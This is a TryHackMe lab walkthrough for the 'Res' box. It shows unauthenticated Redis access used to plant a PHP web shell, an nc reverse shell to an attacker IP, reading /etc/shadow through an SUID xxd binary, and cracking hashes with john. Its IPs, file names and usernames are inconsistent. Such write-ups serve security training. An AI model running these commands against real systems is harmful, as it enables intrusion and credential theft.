Res Walkthrough — TryHackMe
Box Name: Res
IP: 10.10.104.100
Reconnaissance
First and most, scan the IP completely.
nmap -A -p- -Pn -oN nmapFULL 10.10.104.100
- -A: Enable OS detection, version detection, script scanning, and traceroute
- -Pn : Treat all hosts as online — skip host discovery
- -p- : Scan all ports(65,535)
- -oN : Output scan in normal format
Only 2 ports are open [ 80 and 6379 ]
80 is having apache default page
Redis is running on 6379
Enumeration
I ran dirb and gobuster on the web page but haven't found anything interesting. So the next option is Redis Server which is running on 6379.
For connecting Redis server we need to install it on our machine.
sudo apt-get install redis-tools
We can connect to a Redis server with and without a password.
Syntax with Password
redis-cli -h $ip_address -p $passwordSynatx without Without Password
redis-cli -h $ip_address
In our case, unauthorized access is available [ without a password. ]
redis-cli -h 10.10.104.100
Since Redis is much restricted, we need a reverse shell to move on. After a bit of googling found a nice article on that https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce.
It actually pointed to Nginx [ /usr/share/nginx/html ]but we were running apache[ /var/www/html ], so made some modification.
Now we can check whether it is loaded or not, for that browse to we can 10.10.44.110/trail.php
Now we will make a PHP command injection. Either you can overwrite the old trail.php or can create a new PHP file. I have created a new one named rev.php
Exploitation
"<?php system($_GET['cmd']); ?>"
Lets access http://10.10.104.100/shell.php?cmd=whoami
Now we need a reverse shell, I’m using nc one liner for that.
Syntax :
nc -e /bin/bash $attackerIP $attackerPortExample:
nc -w /bin/bash 10.9.62.7 1337
10.10.104/rev.php?cmd=nc -e /bin/bash 10.9.62.7 1337
Non-Interactive Shell to Interactive Shell:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Cntrl +z
stty raw -echo
fg [ Click “Enter “ twice” ]
export TERM=xterm
Privilege Escalation
We can search for programs with SUID permission
find / -perm -u=s -type f 2>/dev/null
The results show a binary xxd with the SUID bit set and the owner is root. We can check for exploitation. For SUID/SUDO privilege escalation GTFOBins is perfect.
From Dtfobins we found that we can read a file with xxd, we will e read /etc/shadow.
LFILE=/etc/shadow
xxd "$LFILE" | xxd -r
Copy and Save the content to our machine [ shadow.txt ]
We need /etc/passwd as well for cracking the password[ passwd.txt ]
unshadow passwd.txt shadow.txt > unshadow.txtjohn --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txtjohn --show unshadow.txt
Now we can switch user to Vinaka with su command.
www-data@ubuntu:/$ su - vinakavianka@ubunru:~$ sudo -lvianka@ubunru:~$ sudo -iroot@ubuntu:~#
Runing ‘sudo -l’, we can see that vianka has full access .To escalate to root all we need to do is run ‘sudo -i ’